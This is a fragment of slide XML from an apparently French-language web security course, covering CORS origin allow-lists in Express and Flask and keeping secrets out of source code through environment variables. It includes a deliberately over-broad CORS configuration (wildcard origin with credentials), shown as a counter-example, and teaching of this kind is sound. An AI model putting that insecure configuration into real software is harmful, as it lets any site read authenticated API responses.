                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>server internal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9282531" y="1490472"/>
            <a:ext cx="1617116" cy="329184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ALLOW-LIST</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9282531" y="1920240"/>
            <a:ext cx="1617116" cy="1005840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Votre code.
Ce qui choisit la valeur.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="26" name="Connector 25"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8801100" y="1371600"/>
            <a:ext cx="0" cy="3794760"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="64748B"/>
            </a:solidFill>
            <a:prstDash val="dash"/>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ACAO</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ACAO : Access-Control-Allow-Origin</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Header de RÉPONSE  ·  ce que le navigateur lit</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Access-Control-Allow-Origin: http://127.0.0.1:8034</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t/>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># Network → la réponse de l'API, pas la page.</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SERVER SIDE  ·  ce qui l’écrit</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 Express</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cors({ origin: "http://127.0.0.1:8034" })</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t/>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># Flask</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>CORS(app, origins=["http://127.0.0.1:8034"])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t/>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># À la main</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>res.setHeader("Access-Control-Allow-Origin", "http://127.0.0.1:8034")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="11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Le navigateur lit ACAO et dit : ce JS-là a le droit de LIRE le body. Ce n’est pas l’auth. Ce n’est pas un firewall.</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03 · allow-list</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Allow-list : les origines que VOUS connaissez</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Une chaîne</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origin: "http://127.0.0.1:8034". Une front, une API.</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Un tableau</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Deux URLs, localhost et 127.0.0.1 comptent pour deux origines.</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Jamais * + credentials</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Cookies + étoile : le navigateur refuse, ou vous ouvrez tout.</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Jamais recopier Origin</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Renvoyer le header Origin tel quel = autoriser tout le monde, poliment.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="42245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L’allow-list remplit ACAO. Ce n’est pas un deuxième header. * dans ACAO = liste = tout le monde.</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day-3/s03_01</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Qui peut lire la réponse dans le navigateur ?</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day-3/s03_01. Deux ports = deux origines. 8034, c’est vous. 8038, c’est l’autre.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Un script kiddie, ou un « founder » qui se fait un mashup avec VOTRE API. CORS le coupe.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16" descr="d3s3-cors-origins.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2961871" y="1591056"/>
            <a:ext cx="6237776" cy="3785615"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>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Politique trop large vs liste explicite. CORS n’est pas l’auth.</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s03_01</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Deux origines. Une seule est à vous.</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day-3/s03_01</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day-3/s03_01  ·  origines</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localhost:8034 et localhost:8038 : deux domaines, pour le navigateur.</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8034 : votre app. 8038 : le mashup. Il se sert, il encaisse.</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Un middleware CORS. Allow-list. L’autre origine ne lit plus.</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Appeler l’API depuis les deux ports. Couper 8038. Garder 8034.</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Lancer le lab. Depuis 8034 : la réponse se lit. Depuis 8038 : aussi, trop large.</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Poser le middleware. Allow-list : 8034 seulement.</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Recharger 8038 : le JS ne lit plus. L’API, elle, tourne toujours.</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Express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Allow-list. Pas une étoile.</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app.use(cors({ origin: "*", credentials: true }));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>// trop large. Le mashup sur :8038 lit tout.</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une chaîne, ou un tableau</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app.use(cors({</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  origin: [</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    "http://127.0.0.1:8034",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    "http://localhost:8034",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  ],</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  credentials: true,</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Ce tableau EST l’allow-list. cors() écrit ensuite ACAO = l’origine qui matche. Pas un autre header.</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Express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Le callback, si l’origine doit être dynamique</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origin peut être une fonction  ·  (origin, cb)</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const ALLOWED = new Set([</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  "http://127.0.0.1:8034",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  "http://localhost:8034",</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app.use(cors({</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  origin: (origin, cb) =&gt; cb(null, ALLOWED.has(origin)),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  credentials: true,</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Preview deploys, plusieurs fronts. Pas obligatoire ici. cb = callback : vous répondez oui/non pour cette Origin-là.</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Flask</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Même allow-list, Flask</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Flask-CORS</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from flask_cors import CORS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t/>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>CORS(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    app,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    origins=["http://127.0.0.1:8034", "http://localhost:8034"],</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    supports_credentials=True,</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 Jamais origins="*". Jamais refléter request.headers["Origin"].</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="11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Les origines que VOUS connaissez. 8038 n’y est pas. Le mashup se débrouille.</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03 · secrets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="987552"/>
            <a:ext cx="10058400" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Un secret dans le source est un secret public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="170078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1005840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Git photocopie. Un repo « privé », un stagiaire, un zip, un screenshot Discord : le mot de passe voyage.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>process.env / os.environ : on sort le secret du fichier. On ne le chiffre pas. Le process le lit encore — le vôtre, et celui d’un plugin.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>.env n’est pas un coffre. C’est « pas dans git ». Deux attaquants différents.</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secrets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Le source ne contient plus le mot de passe</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Dans git  ·  visible par tous ceux qui clonent</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SECRET = "sk-live-93f…"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>const secret = "changeme";</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Hors git  ·  le process le lit au démarrage</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SECRET = os.environ["APP_SECRET"]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>const secret = process.env.APP_SECRET;</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Si quelqu’un exécute du code dans ce process, getenv() marche encore. Slide après le lab.</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149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s3_02_secrets</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Deux routes. Une a besoin d’une variable d’environnement.</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day-3/s3_02_secrets</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day-3/s3_02_secrets  ·  README d’abord</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Une route répond. L’autre refuse : il manque APP_SECRET (ou le nom du README).</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Le README dit comment poser une envar. Pas de magie : export, .env local, pas de commit.</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Ensuite on discute : est-ce que ça suffit vraiment.</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Faire répondre les deux routes. Lire le README. Ne pas committer le .env.</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Lancer sans envar. Voir quelle route casse, et comment.</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Lire README.md. Poser la variable. Relancer. Les deux routes répondent.</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Ouvrir le source : plus de mot de passe. getenv, lui, le voit encore.</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HINT  ·  Flask</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Lire une envar, Flask</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README  ·  puis le process</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 dans le shell, avant de lancer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>export APP_SECRET=lab-only</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 dans l'app</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>import os</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>secret = os.environ["APP_SECRET"]     # KeyError si elle n'est pas là</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>secret = os.getenv("APP_SECRET")      # None si elle n'est pas là</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 optionnel : fichier .env local, jamais commité</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># from dotenv import load_dotenv</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># load_dotenv()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="10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os.environ, c’est le process. Pas un fichier magique. Si vous n’avez pas export, Flask ne voit rien.</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HINT  ·  Express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Lire une envar, Express</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README  ·  puis le process</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 dans le shell, avant de lancer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>export APP_SECRET=lab-only</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 dans l'app</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>const secret = process.env.APP_SECRET;   // undefined si elle n'est pas là</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if (!secret) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  throw new Error("APP_SECRET manquante");</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 optionnel : fichier .env local, jamais commité</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># require("dotenv").config();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="10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process.env, c’est le process Node. Même règle : export, ou dotenv. Pas dans git.</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40080"/>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03 · secrets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="932688"/>
            <a:ext cx="10058400" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>.env : ça décale l’attaquant. Ça ne l’arrête pas.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1444752"/>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627632"/>
            <a:ext cx="10058400" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>10 = trivial. 0 = il faut vraiment la machine, et encore.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="2286000"/>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10  dans le source, GitHub</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
